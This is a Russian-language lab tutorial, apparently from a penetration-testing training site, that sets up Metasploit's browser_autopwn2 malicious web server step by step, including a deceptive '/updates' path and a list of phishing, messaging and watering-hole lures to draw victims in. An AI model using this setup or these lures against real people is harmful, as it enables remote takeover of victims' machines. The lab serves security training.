Настройка атаки Browser Autopwn в Metasploit

Kali LinuxBeginner
Практиковаться сейчас

Введение

В этой лабораторной работе вы углубитесь в одну из мощных функций Metasploit Framework: атаку browser autopwn. Этот тип атаки включает в себя настройку вредоносного веб-сервера, который при посещении целью автоматически обнаруживает тип и версию браузера жертвы, а затем предоставляет эксплойт, адаптированный к любым обнаруженным уязвимостям.

Мы будем использовать модуль auxiliary/server/browser_autopwn2, обновленную и более надежную версию оригинального browser autopwn. Эта лабораторная работа проведет вас через процесс выбора модуля, настройки необходимых параметров и запуска сервера.

Отказ от ответственности: Эта лабораторная работа предназначена исключительно для образовательных целей. Описанные методы следует применять только к системам, которыми вы владеете, или на тестирование которых у вас есть явное разрешение.

Выбор модуля auxiliary/server/browser_autopwn2

На этом шаге вы запустите консоль Metasploit Framework и выберете модуль browser_autopwn2, который станет основой нашей атаки.

Сначала откройте терминал и запустите консоль Metasploit. Мы будем использовать флаг -q для "тихого" запуска, который подавляет баннер для более чистого интерфейса.

msfconsole -q

После загрузки консоли вы увидите приглашение Metasploit, которое выглядит как msf6 >. Metasploit организует свои инструменты по модулям. Чтобы настроить нашу атаку, нам нужно использовать вспомогательный модуль browser_autopwn2. Используйте команду use для его выбора.

use auxiliary/server/browser_autopwn2

После выполнения команды ваше приглашение изменится, указывая, что вы теперь находитесь в контексте этого конкретного модуля.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

Теперь вы готовы настроить параметры модуля.

Установка опции LHOST на IP-адрес Kali

На этом шаге вы настроите опцию LHOST. LHOST означает "Local Host" (локальный хост) и должен быть установлен на IP-адрес вашей атакующей машины (виртуальной машины LabEx). Когда эксплойт будет успешным, машина жертвы подключится обратно к этому IP-адресу, предоставляя вам контроль.

Сначала вам нужно найти IP-адрес вашей виртуальной машины LabEx. Вы можете открыть новую вкладку терминала, нажав на значок + в окне терминала. В новом терминале выполните следующую команду, чтобы отобразить ваш IP-адрес:

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

Вы увидите вывод, похожий на этот. Обязательно скопируйте ваш конкретный IP-адрес.

10.0.2.15

Теперь вернитесь в исходный терминал, где запущена msfconsole. Чтобы увидеть все настраиваемые параметры для модуля browser_autopwn2, используйте команду show options.

show options

Вы увидите список опций. Обратите внимание, что LHOST является обязательным, но еще не установлен. Используйте команду set для настройки LHOST с IP-адресом, который вы только что скопировали. Замените YOUR_IP_ADDRESS на ваш фактический IP-адрес.

set LHOST YOUR_IP_ADDRESS

Например, если ваш IP-адрес был 10.0.2.15, команда будет выглядеть так:

set LHOST 10.0.2.15

Metasploit подтвердит изменение.

LHOST => 10.0.2.15

Теперь LHOST настроен правильно.

Установка URIPATH для вредоносного сервера

На этом шаге вы установите URIPATH. Эта опция определяет конкретный путь на вашем веб-сервере, который жертва должна посетить, чтобы запустить атаку. Использование нестандартного, скрытного пути может сделать атаку менее очевидной.

Как и на предыдущем шаге, вы можете использовать команду show options для просмотра текущих настроек. Вы увидите, что URIPATH имеет значение по умолчанию, но мы изменим его на пользовательское.

Давайте установим путь /updates. Это может ввести пользователя в заблуждение, заставив его думать, что он посещает страницу обновления программного обеспечения. Используйте команду set для изменения URIPATH.

set URIPATH /updates

Консоль подтвердит, что URIPATH был обновлен.

URIPATH => /updates

Теперь вредоносный URL, который жертве нужно будет посетить, будет выглядеть как http://<YOUR_IP_ADDRESS>:8080/updates.

Запуск модуля для старта веб-сервера

На этом шаге, после настройки всех необходимых опций, вы запустите вспомогательный модуль. Это запустит веб-сервер на вашей машине, который будет ожидать входящих соединений от потенциальных жертв.

Чтобы запустить модуль, просто введите run в командной строке msfconsole и нажмите Enter.

run

Metasploit теперь запустит сервер и загрузит все соответствующие эксплойты для браузеров. Вы увидите много вывода по мере инициализации сервера. Ключевая информация, на которую следует обратить внимание, — это подтверждение того, что сервер запущен, и URL, который он использует.

Вывод будет выглядеть примерно так (некоторые детали могут отличаться):

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (будет перечислен множество других эксплойтов) ...

Ваш вредоносный сервер теперь запущен и активно ожидает подключения браузера к http://10.0.2.15:8080/updates (с вашим фактическим IP-адресом). Когда браузер подключится, сервер проанализирует его и попытается запустить подходящий эксплойт.

Обсуждение способов заманивания цели на вредоносный URL

На этом заключительном этапе мы обсудим самую критическую часть этой атаки: заставить цель посетить вредоносный URL. Сервер запущен, но он пассивен; он ничего не сможет сделать, пока жертва не перейдет по ссылке. Этот этап в значительной степени опирается на социальную инженерию.

Поскольку эта лабораторная среда не включает отдельную "жертвенную" машину, этот шаг является чисто концептуальным. Команды для выполнения отсутствуют.

Вот несколько распространенных методов доставки вредоносной ссылки (http://YOUR_IP_ADDRESS:8080/updates) цели:

  • Фишинговые электронные письма: Отправка обманчивого электронного письма, которое побуждает пользователя перейти по ссылке. Например, письмо может выдавать себя за оповещение о безопасности, специальное предложение или уведомление о сбросе пароля.
  • Мгновенные сообщения: Отправка ссылки напрямую цели через приложение для чата, часто с сообщением вроде "Эй, зацени этот крутой сайт!"
  • Социальные сети: Публикация ссылки на платформе социальных сетей, как публично, так и в личных сообщениях, чтобы побудить к переходу.
  • Атака "Watering Hole" (Водопой): Более продвинутая техника, при которой злоумышленник компрометирует легитимный веб-сайт, который цель часто посещает. Затем злоумышленник встраивает вредоносную ссылку или перенаправление на этот сайт.

Если цель с уязвимым браузером посетит ваш URL, browser_autopwn2 автоматически предоставит соответствующий эксплойт. Если эксплойт будет успешным, в вашей консоли Metasploit откроется "сессия", предоставляющая вам удаленный доступ к машине жертвы. Вы увидите сообщение вроде [*] Session 1 opened... в вашем терминале.

Резюме

Поздравляем с завершением этой лабораторной работы! Вы успешно освоили основные шаги для настройки атаки browser autopwn с использованием Metasploit Framework.

В этой лабораторной работе вы:

  • Запустили консоль Metasploit.
  • Выбрали модуль auxiliary/server/browser_autopwn2.
  • Настроили основные параметры LHOST и URIPATH.
  • Запустили вредоносный веб-сервер и поняли его функцию.
  • Обсудили методы социальной инженерии, необходимые для привлечения цели на вредоносный URL.

Это упражнение демонстрирует, насколько мощными и автоматизированными могут быть инструменты тестирования на проникновение. Оно также подчеркивает критическую важность своевременного обновления веб-браузеров и их плагинов для защиты от подобных атак. Всегда помните об ответственном и этичном использовании полученных знаний.